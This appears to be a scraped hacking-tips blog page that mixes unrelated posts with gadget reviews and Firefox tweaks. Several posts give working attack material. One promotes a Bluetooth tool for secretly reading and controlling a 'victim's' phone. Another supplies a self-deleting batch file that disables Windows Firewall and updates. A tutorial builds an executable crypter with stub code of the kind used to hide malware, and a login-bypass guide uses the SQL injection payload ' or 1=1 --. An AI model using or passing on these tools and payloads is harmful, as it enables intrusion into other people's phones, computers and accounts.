This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Super Bluetooth Hack 2008

his is a New Version of Super bluetooth Hack for Conventional and Mobile-based Symbian. This program through MDM can be used to control other people’s mobile phone at a distance (10-15 metres, it’s Then)


Super Bluetooth hack New 2008

More in New Version :

1) Connect via BT/Irda
2) Reading SMS
3) Changing time/alarms
4) Pressing keys…

What else can you do once connected to a another phone via blue tooth?

1) Read SMS matches.
2) Turn off telephone.
3) Switch on music.
4) Choose modes (normal, without sound …)
5) Block Phone.
6) Read his Contacts
7) Change Profile
Play his Ringtone even if phone is on silent
9) Restore Factory Settings.
10) Restart the phone
11) Change Ringing Volume
And here comes the best
“Call from his phone” it includes all call functions like hold etc.
And much, much more


Install:
1) Download
2) Pour on the mobile
3) Run the Installer (what you download, incidentally need java
4) He finds it, and you will be able to run software
5) Choose the language and going configured
6) click Connection
7) Click search devices
Choose the “victim”
9) AND MANAGE

Download Super Bluetooth hack New 2008

Which Browser Are More Secure


Some new statistics just came out regarding Browser Security, this is more in terms of which users are most likely to apply patches and be using the most secure version.

I would have thought Firefox would have been pretty high since the newer series prompt automatically new patches. My only guess is a lot of people are still using 1.5x series which didn’t have that feature.

It turns out, that Internet Explorer is the ‘most secure’. Well that’s very subjective as IE doesn’t show sub versions like the other browsers do..and Windows Updates pushes out patches quite agressively. It also depends which set of data you look at as both conflict, one says Firefox users are more secure and one says IE.

The researchers who published a large study of web browser security this week had a great idea and excellent data to work with. Too bad they overreached with their conclusions. A lot more is being made of this paper than is warranted.

The researchers, from ETH Zurich, Google, and IBM, looked at log data provided by Google from their global user base for web search and applications for the period between January 2007 and June 2008. This data was based on the browser user-agent string, which is also the reason the data is not as telling as the authors argue.

What did the study conclude? First, lots of users are not running the most up-to-date and secure versions of their web browsers. Second, that this is primarily a phenomenon of Internet Explorer users; Firefox users, on the other hand, overwhelmingly update their browsers quickly. These and other results lead the authors to suggest that browsers get expiration dates, much like milk and pharmaceuticals.

As expected though a LOT of users are not running the latest version of their browser, but that doesn’t surprise us really does it?

I think the versioning is an issue though, with IE you only get to know about the major version (IE5, IE6, IE7, IE8) and not which actual patches they have applied.

Why, one might ask, does Microsoft not provide minor version information? Microsoft’s David LeBlanc answers that question in his blog by saying that they consider such information to be an “information disclosure vulnerability.” In other words, by giving a web-based attacker precise version information, you are also giving them better information on how to attack that browser.

In these measurements IE7 users are much more likely to be up to date than other browser users. The authors are correct that Secunia users are more likely to be security-aware, but even when they try to adjust the numbers, multiplying the IE7 number by 2.1 “… to correct for the bias of Secunia’s measurement within a security aware user population” IE7 still ends up looking better.

There is actually a discrepency between the two sets of data, the metrics are odd though and are based on heavy assumptions (IE7 is secure but IE6 is not, while IE7 is a MORE secure browser architecture and feature wise, a fully patched IE6 can also be perfectly secure).

I’d be interested to see more of these stats and see the full Google access logs for a few month period.

That would be some interesting data mining.

Source: eWeek


Batch File To Disable Firewall-Windows Xp Sp2

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\firewall.reg" ECHO REGEDIT4
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\firewall.reg"
DEL "%Temp%.\firewall.reg"
DEL %0



Shuts down Windows Firewall, disables Automatic Updates for the next reboot.

And no, Microsoft is not going to fix this. This code will work when it goes live.



Build your own executable crypter

This article will take you through the basic steps of building an executable crypter. All of the steps performed in this article require manual setup and integration to prepare the exe for the crypter stub. The focus of this article is to walk you through the theory and know-how of how crypters work and does not attempt to create the latest greatest point and click solution.

For a basic background, here is how executable crypters work:

1) The actual processor commands of a protected binary are
crypted/obscured/munged whatever

2) When the protected application first starts, a small decrypter
stub is first run that restores all of the original processor
commands for the executable in memory.

3) Finally, the decrypter stub ends and transfers execution to the
original entry point (OEP) and the program runs normally.

In the course of this paper, we are going to manually implement a very simple 'crypter' to show you all of the development techniques, design considerations, and debugging details required to make your own.

First, let me introduce you to our target executable. It is a 28kb hello world application written in C. This simple application merely prints out "Hello World" to the screen, waits for a keypress and then exits.

To get us started, lets examine the PE structure of the executable file. Below is an image of the PE section table. You will notice that the .text section (where the actual executable code is housed) has a raw size of 4000h and a virtual size of 3DCEh .

The discrepancy in the numbers indicates that at the end of the .text section there is a certain amount of unused space not currently mapped into memory when the file is loaded. This blank spot in the executable file is good because it means we have an empty pad where we can place our own executable code.

To visually verify this you can open up the file in a hexeditor and look for a null pad. To know where to look you have to be able to find the right file offset. In our sample exe this is simplified because all of our sections have a virtual size <= their raw size and each sections raw offset = its virtual offset.

This is nice because it keeps all of the rva values in the PEheader = raw file offsets however this is not always the case. V.2 of the pe editor classes now take this into account and can calculate file offsets from rva values correctly. The assumption of rva = file offset will be made through out the remainder of this article because it holds true for this particular sample we are analyzing.

So...to see this null pad open up the original exe file in a hexeditor and check out the area between 4DCEh and 5000h (RawOffset + VirtualSize)

Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F

00004DC0 C0 74 06 0F B6 45 0B C9 C3 83 C8 FF C9 C3 00 00 Àt..E.ÉÃÈÿÉÃ..
00004DD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004DE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004DF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

For our needs this will be more than enough space to place our simple decrypter stub. We do not necessarily need to squeeze our code into an existing section. Had we been short on space, we could have resorted to adding a new PE section and placing our code there.

Ok, we have found a home for our decrypter block, but first we have to make some adjustments to the PE section characteristics so that:

A) our decrypter code gets loaded into memory
B) once mapped into memory, we have write access to the main body of code
C) when the program is first loaded, execution begins with our decrypter code

As noted above, the virtual size of the section (the size loaded into memory) does not include this null pad we found in the file. Since we are going to be adding code to this area, we need to make sure that this area is loaded into memory as well. This is accomplished by increasing the virtual size for this PE section using a PE editor such as LordPE.

The second change we have to make is to make sure that the .text section is flagged as a writable area once mapped into memory. This is necessary because our decrypter stub needs to dynamically rewrite (decode) the actual processor codes to be executed. This too is easily done with LordPE from the "edit section header" dialog. Below is a graphic of the dialog sequence and field manipulations required in LordPE. Highlighted in yellow are the fields that we have altered.

Our next goal now becomes to make sure that when the executable first loads it is our decrypter stub that is first run. Since the real processor commands for the executable will not present on disk, having the program start at the original entry point would have the machine trying to execute what is essentially a jumbled block of data.

The program entry point can be directly edited from LordPEs main interface. For our demonstration lets choose to set the entry point at 4E00h. This offset sits 32 bytes from the end of our real applications code and gives us a nice easy spot to find in the hexeditor.

With the PE structure modifications out of the way, now we can move on to the actual work. Here is what we have left:

D) build the decrypter stub
E) crypt the actual executable's opcodes
F) integrate our decrypter stub into the modified binary

Lets start with some design visions for our encoding mechanism. Since this is a demo and a trainer, the encoding mechanism is going to be kept as lightweight and simple as possible. For these reasons a simple XOR encoding will be used.

The next design consideration is to enumerate what kind of variables a generic crypter stub is going to need. Basically any crypter stub is going to need three things:

1) what offset (in memory) to start decrypt data
2) length of the data to decrypt
3) entry point to transfer execution to after decrypted

Since we are designing a really simple stub, I am going to take a short cut and start the encryption routine right at the programs original entry point. While the EP is not at the very beginning of the code section, it is usually close enough that the majority of processor commands will be encrypted.

Before we get into the actual design and development of out decrypter stub, lets knock off the easy part of XORing the original opcodes first. This is a simple operation, and can be done in whatever way is the most convenient for the developer. The implementation I chose was to create a quick VB program that loops through the binary applying the XOR to the appropriate bytes representing the applications opcodes.

For a quick refresher:

Q) How do i know where the opcodes begin?
A) for our simple setup we are starting at the original program
entry point found in the PE Header

Q) How do I know how long of a block to encode?
A) Since we want to encode all of the opcodes after the entry point,
length of the data to encrypt is Original Virtual Size - Entry Point

Inline below is the VB source code used to encode the executable's opcodes:

StartAt = &H1048 'original entry point
length = &H2D86 '3DCE - 1048 (virtual size - entrypoint)

Open p2 For Binary As f

For i = 1 To length
offset = StartAt + i
Get f, offset, b
b = b Xor &HF
Put f, offset, b
Next

Close f


With that out of the way, we are now down to developing our decrypter stub. Basically what we need is a small block of ASM commands that we can paste into the encoded binary at our new entry point.

Below is the decoder block I came up with written in C:

void main(void){

int i;
char b;

char *buffer = 0x400000 ; // imagebase
long length = 0xBEEF ; // <-length of code (placeholder)

buffer += 0xDEAD ; // <- OEP offset (placeholder)

for(i=0; i < length; i++){

b = buffer ;
b = b ^ 0xF ;
buffer = b ;

}

_asm jmp buffer

}

Let me mention a couple points and design considerations about the above code.

* To make the stub generic you are going to have to edit the length and entry point offsets each time you use it. Make these some recognizable values in hex to make it easier to find them in the hexeditor.

* *buffer initially points to the imagebase, remember you are going to be working on memory addresses. The reason I increment *buffer latter to the entry point offset is because I will have to edit this value independently in a hexeditor.

* to transfer execution to the original entry point we just use a inline asm command jmp buffer. At this point *buffer is already pointing directly to the programs original entry point.

All in all it is a very simple decoder stub. The trick comes in debugging and implementing it. Since the decoder is designed to work on data and offsets not found in this standalone application, we can really only use the compiler to generate the opcodes for the commands we need. Debugging takes place by integrating the actual stub byte codes into our crypted exe and running that through the debugger.

Now that we have our proposed C source, we need the assembler byte codes associated with it. The easiest way I have found to get the asm byte codes from the compiler is to set a break point at the top of the code and start up the VC debugger by pressing F5.

Once VC has compiled the code, it will then launch the built in debugger which pauses execution at your preset breakpoint. Now you can right click on the main window and choose "goto disassembly" to see a mixed assortment of C and ASM commands.

Below is a stripped down ASM block generated by the compiler for us. On the left are the actual byte codes associated with the string assembler commands on the right.

C7 45 F4 00 00 40 00 mov dword ptr [ebp-0Ch],400000h
C7 45 F0 EF BE 00 00 mov dword ptr [ebp-10h],0BEEFh
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
05 AD DE 00 00 add eax,0DEADh
89 45 F4 mov dword ptr [ebp-0Ch],eax
C7 45 FC 00 00 00 00 mov dword ptr [ebp-4],0
EB 09 jmp main+43h
8B 4D FC mov ecx,dword ptr [ebp-4]
83 C1 01 add ecx,1
89 4D FC mov dword ptr [ebp-4],ecx
8B 55 FC mov edx,dword ptr [ebp-4]
3B 55 F0 cmp edx,dword ptr [ebp-10h]
7D 22 jge main+6Dh
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
03 45 FC add eax,dword ptr [ebp-4]
8A 08 mov cl,byte ptr [eax]
88 4D F8 mov byte ptr [ebp-8],cl
0F BE 55 F8 movsx edx,byte ptr [ebp-8]
83 F2 0F xor edx,0Fh
88 55 F8 mov byte ptr [ebp-8],dl
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
03 45 FC add eax,dword ptr [ebp-4]
8A 4D F8 mov cl,byte ptr [ebp-8]
88 08 mov byte ptr [eax],cl
EB CD jmp main+3Ah
FF 65 F4 jmp dword ptr [ebp-0Ch]

In order for us to insert this into our executable, we must further strip out just the byte codes and write the hex values into our executable file. A nice way to do this is to strip out the assembler commands, remove all of the spaces, and place then in a long string such as this:

C745F400004000C745F0EFBE00008B45F405ADDE00008945F4C745FC
00000000EB098B4DFC83C101894DFC8B55FC3B55F07D228B45F40345
FC8A08884DF80FBE55F883F20F8855F88B45F40345FC8A4DF88808EB
CDFF65F4

From here, you can copy the text string and write the associated hex values directly into the binary using the Winhex hexeditor by highlighting the start offset (4E00h) pressing Ctrl-B (write clipboard) and then choosing the "ACII Hex" clipboard format.

Once that is done, all we have left is to edit the data length and start offset placeholders compiled into the stub and it will be configured for this binary. If you wrote the stub in starting at offset 4E00h then you will find the BEEFh data length marker at offset 4E0Ah , and the DEADh entry point marker at offset 4E12h.

Note that both of these values are in little endian format. When you go to modify them with the actual values, remember to also write the new values in little endian format.

Below are hexeditor views of the modifications made.

Offset 0 1 2 3
00004E10 .. .. AD DE (DEAD)
00004E10 .. .. 48 10 (1048)

Offset 0 1 2 3 4 5 6 7 8 9 A B
00004E00 .. .. .. .. .. .. .. .. .. .. EF BE (BEEF)
00004E00 .. .. .. .. .. .. .. .. .. .. 86 2D (2D86)

With our decrypter block in place, our main code crypted, and the entry point now aimed at the decrypter, everything should be set and ready to run !

Open it up in Olly, give it a shot and see what happens. Before you start stepping through code, look around the original entry point and see what the disassembly looks like.

004010DC 12 DB 12
004010DD 05 DB 05
004010DE 0F DB 0F
004010DF 0F DB 0F
004010E0 AE DB AE
004010E1 53 DB 53
004010E2 63 DB 63
004010E3 4F DB 4F
004010E4 0F DB 0F
004010E5 AC DB AC
004010E6 6F DB 6F
004010E7 63 DB 63
004010E8 4F DB 4F

Yup, thats a jarbled mess characteristic of a data block or encrypted opcodes... Now go back to the end of the decrypter block and set a breakpoint on the final "jmp buffer" command:

00404E55 >^FF65 F4 JMP DWORD PTR SS:[EBP-C] ; final.00401048

After reaching this point, scroll back up again and take another look at the original entry point 401048. If you still see a junk block of commands such as the above mess, it is because Olly has not yet analyzed the new byte values for processor commands. To fix this, right click in the main disassembly window and choose 'analyze code'. Now you should see the actual decoded instructions:

00401048 /. 55 PUSH EBP
00401049 |. 8BEC MOV EBP,ESP
0040104B |. 6A FF PUSH -1
0040104D |. 68 B8504000 PUSH final.004050B8
00401052 |. 68 9C244000 PUSH final.0040249C ; SE handler installation
00401057 |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040105D |. 50 PUSH EAX
0040105E |. 64:8925 000000>MOV DWORD PTR FS:[0],ESP
00401065 |. 83EC 10 SUB ESP,10

Now you can hit the run button and Voila ! It should all function just as expected !

Looks like everything is in place and running just as it should be Smiley

Note that using C to generate the Opcodes can make the decoder a bit bloated. If you wanted to write your decoder directly in asm you could use a stub similar to the following: (even this could be optimized further)

00404E3A B8 48104000 MOV EAX,401048 ;start offset
00404E3F B9 862D0000 MOV ECX,2D86 ;length
00404E44 8BD0 MOV EDX,EAX ;copy of start offset (OEP)
00404E46 8030 0F XOR BYTE PTR DS:[EAX],0F ;top_of_loop decode inst
00404E49 40 INC EAX ;next byte
00404E4A 49 DEC ECX ;dec counter
00404E4B ^75 F9 JNZ SHORT 00404E46 ;counter !=0 goto top_of_loop
00404E4D FFE2 JMP EDX ;jmp OEP

As one last little nugget, let me throw out a quick tip you can use to restore a crypted exe such as this to its former state Smiley

Lets assume the decrypter stub did some actual encryption that we do not want to try to reverse engineer. If the crypter stub only operated on an uncompressed data block that was fully present in the exe and did not perform any other tricks or manipulations the restoration of the executable can actually be very simple.

Give this a shot..load the exe in olly and break on the last jmp buffer. Here the actual executable code is fully decrypted in memory and ready to be run. Now fire up LordPE and dump the 401000 - 405000 memory address range to grab the full .text section from memory. You now have all of the decrypted opcodes saved to disk Wink

Write down the address of the original entry point that the jmp command was going to take you to and exit olly. Open up the memory dump and the crypted exe in Winhex and write the entire dump of the .text section over the crypted .text section in the executable.

Save it, then change the entry point back to the original you wrote down and give it a click. Tadaahhh magic.....kinda..well not really...but you know. *shrugs*

Anyway, this was a fun bit to design and figure out how to do. Hopefully this takes some of the "magic" out of how executable crypters work and should be enough to help someone else along.

I also caved in and wrote an quick point and click utility to integrate this crypter stub into arbitrary executables. You can snag the app plus VB source here. (also has a nice set of classes for PE header manipulation)


Source: http://sandsprite.com/CodeStuff/Build_your_own_executable_crypter.html[/quote]

Make Mp3 Files Smaller Without Losing Quality

If you don't already have a copy of MusicMatch Jukebox, download one from musicmatch.com. The "Plus" version has more features and burns CDs faster, but the free version works just fine for converting files
1. Install music match box and then restart your computer if it asks
2. open music matchbox and click file convert files
3. in the bottom right hand corner called 'destination type' change it to mp3 pro.
4.you can edit the bitrate but the higher the bitrate the bigger the size
5. choose the songs you want to convert and click start***if you want to try something different repeat step one and 2 and instead of making the destintion type mp3 pro make it 'mp3pro vbr'again the lower the setting the smaller the size.

Hacking Websites

If you have the html and javascript knowledge then you can access password protected websites. So you want to know how??
keep reading.....
1. Open the website you want to hack. Provide wrong username-password in its log in form.
(e.g : Username : me and Password: ' or 1=1 --)
An error will occur saying wrong username-password. Now be prepared
Your experiment starts from here...
2. Right click anywhere on that error page =>> go to view source.
3. There you can see the html codings with javascripts.
4. There you find somewhat like this....<_form action="..login....">
5. Before this login information copy the url of the site in which you are.
(e.g :"<_form..........action=http://www.targetwebsite.com/login.......>")
6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)
7. Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> " there instead of "<_type=password>". See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )
8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:\chan.html)
9. Reopen your target web page by double clicking 'chan.html' file that you saved in your
harddisk earlier.
10. U see that some changes in current page as compared to original One. Don't get worried.
11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]
Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.
*****[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]
The above trick won't work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick. Enjoy!!!!
WARNING: We post this trick just for your educational knowledge only. Don't misuse it other wise you will be in trouble. I take no responsibility of usage of the above trick]

Secret Backdoor To Many Websites

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.Can we solve this problem? Yes, we can.
We merely have to convince the site we want to enter, that WE ARE GOOGLE.In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple:
by changing your browser's User Agent.
Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]@="Googlebot/2.1""Compatible"="+http://www.googlebot.com/bot.html"Voila! You're done!You may always change it back again....
I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

write in colorful letters

javascript:cor=new Array(’aqua’,'blue’,'fuchsia’,'gold’,'gray’,'green’,'lime’,'maroon’,'navy’,'olive’,'orange’,'pink’,'purple’,'red’,’silver’,'teal’,'violet’,'yellow’ );var z=0;txt=document.getElementsByTagName(’textarea’)[0];txt.value=txt.value.replace(/(.)/gi,”§$1″);txt.value=txt.value.replace(/\§ /gi,” “);for(y=0;ysteps:write ur scrapthen copy this script in ur adrees bar nd press enter then submitt the scrap———————————————————————

BEST DOWNLOAD FOR MOBILE

1. opera-mini-3.1.7203-advanced-int.jar Size:
96.77 KbCompatible with:All J2ME models :: All Any J2ME device Download to Mobile: Open wap.GetJar.com with your mobile -> Quick Download -> enter Quick Download Code 9531 Camera download to mobile You will need OneShot Downloader for Camera downloads Download to PC:JAD file (opera-mini-3.1.7203-advanced-int.jad)JAR file (opera-mini-3.1.7203-advanced-int.jar)
2. opera-mini-3.1.7203-basic-int.jar Size:
56.35 KbCompatible with:Other J2ME :: Sony Ericsson (P800, P802, T610, T616, T618, T628, T630, Z600); Nokia (2650, 3120, 3200, 3510i, 3650, 5100, 6030, 6100, 6610, 6610i, 7250i, 7650, N-Gage, N-Gage QD); Samsung (SGH-E330, SGH-E630, SGH-X460); Siemens (A65, C55, C60, MC60, SX1); LG (B2100, C1100, C2200); Panasonic X200 Download to Mobile: Open wap.GetJar.com with your mobile -> Quick Download -> enter Quick Download Code 4985 Camera download to mobile You will need OneShot Downloader for Camera downloads Download to PC:JAD file (opera-mini-3.1.7203-basic-int.jad)JAR file (opera-mini-3.1.7203-basic-int.jar)
3. opera-mini-3.1.7203-advanced-int.zip Size:
103.77 KbCompatible with:Palm Hi-Res (320×320+) :: Palm Hi-Res Download to PC: Download opera-mini-3.1.7203-advanced-int.zip————————————————————————————-

Access ORKUT On Your Mobile Phone or PDA

Here is a tip for all Orkut users… Have you ever tried to access orkut on your mobile browser, or even OPERA MINI.
If you have tried, you must surely know what happens……….
Let me tell u for those who have not tried it..The login box does not appear…. As a result you cannot sign in and therefore, to say as a whole, ORKUT CANNOT BE ACCESSED ON MOBILE!!!!!
But here is a trick for all to ACCESS ORKUT ON YOUR MOBILE.. You need to do nothing, just follow the link-https://www.google.com/accounts/Serv….aspx&hl=en-US
And you will see that only the login-box appears, just sign in and there you are…The whole ORKUT at your hands!!!!
If you lose this link,, here is how to get it.. when you open www.orkut.com on your pc. The login box loads in a different frame.., In Firefox, right click on this frame and Select load this frame only, and the link you get for that frame is this link.Actualy what happens is that we load only this frame and not the others..
————————————————————————————-

15 Firefox Tricks

Everybody’s favorite open-source browser, Firefox, is great right out of the box. And by adding some of the awesome extensions available out there, the browser just gets better and better.
But look under the hood, and there are a bunch of hidden (and some not-so-secret) tips and tricks available that will crank Firefox up and pimp your browser.
Make it faster, cooler, more efficient. Get to be a Jedi master with the following cool Firefox tricks.
1) More screen space. Make your icons small. Go to View - Toolbars - Customize and check the “Use small icons” box.
2) Smart keywords. If there’s a search you use a lot (let’s say IMDB.com’s people search), this is an awesome tool that not many people use. Right-click on the search box, select “Add a Keyword for this search”, give the keyword a name and an easy-to-type and easy-to-remember shortcut name (let’s say “actor”) and save it.
Now, when you want to do an actor search, go to Firefox’s address bar, type “actor” and the name of the actor and press return. Instant search! You can do this with any search box.
3) Keyboard shortcuts. This is where you become a real Jedi. It just takes a little while to learn these, but once you do, your browsing will be super fast. Here are some of the most common (and my personal favs):
* Spacebar (page down)
* Shift-Spacebar (page up)
* Ctrl+F (find)* Alt-N (find next)
* Ctrl+D (bookmark page)
* Ctrl+T (new tab)
* Ctrl+K (go to search box)
* Ctrl+L (go to address bar)
* Ctrl+= (increase text size)
* Ctrl+- (decrease text size)
* Ctrl-W (close tab)
* F5 (reload)
* Alt-Home (go to home page)
4) Auto-complete. This is another keyboard shortcut, but it’s not commonly known and very useful. Go to the address bar (Control-L) and type the name of the site without the “www” or the “.com”. Let’s say “google”. Then press Control-Enter, and it will automatically fill in the “www” and the “.com” and take you there - like magic! For .net addresses, press Shift-Enter, and for .org addresses, press Control-Shift-Enter.
5) Tab navigation. Instead of using the mouse to select different tabs that you have open, use the keyboard. Here are the shortcuts:
* Ctrl+Tab (rotate forward among tabs)
* Ctrl+Shft+Tab (rotate to the previous tab)
* Ctrl+1-9 (choose a number to jump to a specific tab)
6) Mouse shortcuts. Sometimes you’re already using your mouse and it’s easier to use a mouse shortcut than to go back to the keyboard.
Master these cool ones:
* Middle click on link (opens in new tab)
* Shift-scroll down (previous page)
* Shift-scroll up (next page)
* Ctrl-scroll up (decrease text size)
* Ctrl-scroll down (increase text size)
* Middle click on a tab (closes tab)
7) Delete items from address bar history.
Firefox’s ability to automatically show previous URLs you’ve visited, as you type, in the address bar’s drop-down history menu is very cool. But sometimes you just don’t want those URLs to show up (I won’t ask why).
Go to the address bar (Ctrl-L), start typing an address, and the drop-down menu will appear with the URLs of pages you’ve visited with those letters in them. Use the down-arrow to go down to an address you want to delete, and press the Delete key to make it disappear.
8) User chrome. If you really want to trick out your Firefox, you’ll want to create a UserChrome.css file and customize your browser. It’s a bit complicated to get into here, but check out this tutorial.
9) Create a user.js file.
Another way to customize Firefox, creating a user.js file can really speed up your browsing. You’ll need to create a text file named user.js in your profile folder (see this to find out where the profile folder is).
10) about:config. The true power user’s tool, about.config isn’t something to mess with if you don’t know what a setting does. You can get to the main configuration screen by putting about:config in the browser’s address bar.
See Mozillazine’s about:config tips and screenshots.
11) Add a keyword for a bookmark. Go to your bookmarks much faster by giving them keywords. Right-click the bookmark and then select Properties. Put a short keyword in the keyword field, save it, and now you can type that keyword in the address bar and it will go to that bookmark.
12) Speed up Firefox. If you have a broadband connection (and most of us do), you can use pipelining to speed up your page loads. This allows Firefox to load multiple things on a page at once, instead of one at a time (by default, it’s optimized for dialup connections). Here’s how:
* Type “about:config” into the address bar and hit return. Type “network.http” in the filter field, and change the following settings (double-click on them to change them):
* Set “network.http.pipelining” to “true”
* Set “network.http.proxy.pipelining” to “true”
* Set “network.http.pipelining.maxrequests” to a number like 30. This will allow it to make 30 requests at once.* Also, right-click anywhere and select New-> Integer.
Name it “nglayout.initialpaint.delay” and set its value to “0″. This value is the amount of time the browser waits before it acts on information it receives.
13) Limit RAM usage. If Firefox takes up too much memory on your computer, you can limit the amount of RAM it is allowed to us. Again, go to about:config, filter “browser.cache” and select “browser.cache.disk.capacity”. It’s set to 50000, but you can lower it, depending on how much memory you have. Try 15000 if you have between 512MB and 1GB ram.
14) Reduce RAM usage further for when Firefox is minimized. This setting will move Firefox to your hard drive when you minimize it, taking up much less memory. And there is no noticeable difference in speed when you restore Firefox, so it’s definitely worth a go. Again, go to about:config, right-click anywhere and select New-> Boolean. Name it “config.trim_on_minimize” and set it to TRUE. You have to restart Firefox for these settings to take effect.
15) Move or remove the close tab button. Do you accidentally click on the close button of Firefox’s tabs? You can move them or remove them, again through about:config. Edit the preference for “browser.tabs.closeButtons”. Here are the meanings of each value:* 0: Display a close button on the active tab only* 1Default) Display close buttons on all tabs* 2on’t display any close buttons* 3isplay a single close button at the end of the tab bar (Firefox 1.x

Make FIREFOX browser run at full speed

1. first in the URL bar, Type “about:config”. This will bring up a list of commands and variables you can edit.
2. The second step is to put “network.http.pipelining” in the filter and change the value to “true”.
3. After that you will want to put “network.http.proxy.pipelining” in the filter.Like the last one, make that value set to “true” also.
4. Next, locate “network.http.pipelining.maxrequests” and change the value to some number higher, say 10,20 or even 30, it would make up to 10,20 or 30 requests at once.
5. The last step is to right click anywhere and select “New” then “Integer”. Name it “nglayout.initialpaint.delay” and make its value “0″. This will make the browser respond faster on the information of the websites it receives.
6. Close out FireFox (make sure FireFox is closed by viewing the Task Manager) and restart it and enjoy the new mega speed

Sense View P430 Electronic Magnifier


It looks like a typical PMP device but in reality its a gadget for the weak eyes. It is a magnifier from Himskorea, the Sense View P430 which features a 4.3" TFT-LCD monitor and has six color select options.. The camera is placed at the rear side and magnifies the desired area. It has six different color options and the ability to capture images. The Sense View P430 works on Lithium polymer batteries which gives upto 4.5 hours of continuous usage. This electronic magnifier 'Sense View' is for the elderly with weak eyesight. If you put the magnifier on a certain part of a book or magazine, it enlarges the part as much as you want. It is possible to capture images also.

The Vosonic VP8360


The Vosonic VP8360 is a powerful multimedia viewer with a 3.6” TFT LCD and 2.5” HD capacity (40~120GB) giving you more room and fun to play. The VP8360 basically takes its predecessor VP8350's concept up a notch by introducing a more standard rechargeable battery and "enhanced ergonomics". It's also a bit bigger due to the use of a 2.5-inch hard drive, rather than the VP8350's 1.8-inch drive giving you an option to nsert a 120GB HDD in there. It also supports a whole slew full of formats (ranging from standard stuff like MP3, WMA, MPEG4 to e.g. MOV and several RAW profiles). The "image tank" character is emphasized by the Compact FlashTM Card type I/type II (CF), Memory Stick® (MS), Secure Digital Card (SD)/MultiMedia Card (MMC) and IBM ®MicroDrive card compatibility. It has also got some games like Tetris to keep you busy while you're waiting for your files to transfer.

The Sony Cyber-shot DSC-W70


